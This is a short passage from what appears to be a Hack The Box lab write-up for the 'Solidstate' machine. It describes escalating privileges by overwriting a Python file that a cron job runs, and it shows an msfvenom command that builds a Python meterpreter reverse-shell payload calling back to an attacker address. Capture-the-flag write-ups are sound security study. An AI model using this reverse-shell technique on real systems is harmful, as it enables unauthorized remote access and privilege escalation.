jakobgoerke/hackthebox-machine-writeups/Solidstate/readme.md

 So lets try to escalate our privilege by creating a new msf payload.
 Then we start the msf reverse handler, overwrite the python file and wait for the cronjob to execute our payload.
+( that step could be easier to exploit.
+But i dont wanna spoil the challenge for other users that are with me on the box at the same time )

 ```{r, engine='bash', sh}
 msfvenom -p python/meterpreter/reverse_tcp LHOST=10.10.14.40 LPORT=8888